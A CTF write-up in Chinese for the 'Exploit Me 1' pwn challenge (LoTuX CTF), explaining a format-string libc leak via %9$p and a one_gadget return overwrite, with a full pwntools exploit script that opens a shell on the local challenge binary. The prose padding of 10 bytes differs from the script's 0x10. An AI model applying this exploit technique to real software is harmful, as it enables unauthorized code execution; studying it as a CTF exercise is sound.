Try   HackMD

Exploit Me 1 (LoTuX CTF)

Author: 堇姬Naup

asm

他可以輸入兩個東西,一個是fmt,一個是one_gadget,如果要用one_gadget,那就需要leak libc base,可以用fmt來leak

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

One_gadget

先看one gadget,需要達成幾個條件:
rsi == NULL
rdx == NULL
rbp-0x78可寫

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

觀察到最後他有兩個xor,所以前兩個條件已經達成了,接下來差rbp-0x78可寫,隨便找一段可寫丟給rbp就好了

解法

先leak libc
隨便試了一下,可以看到%9$p,會印出一個libc的address,可以用來leak libc
offset = 0x29d90

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

先做 b'a'*10,蓋到old rbp前

另外因為有開PIE,所以去找沒再用的libc可寫空間比較方便,因為我們已經有libc base了,這邊選

0x7ffff7e1a2c0-0x7ffff7c00000=0x21a2c0

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

這邊蓋在rbp,最後填onegadget offset -> 0xebc88

備註:記得用libc裡面的東西要加libc base

script

from pwn import * r=process('./chal') libcoffset=0x29d90 onegadget_offset=0xebc88 r.sendlineafter(b'Give Me FMT > ',b'%9$p') leak_libc=int(r.recvline().strip().decode(),16) libc_base=leak_libc-libcoffset onegadget=onegadget_offset+libc_base writeable=0x21a2c0+libc_base print(hex(leak_libc)) payload=b'a'*0x10+p64(writeable)+p64(onegadget) r.sendlineafter(b'Give Me One Gadget > ',payload) r.interactive()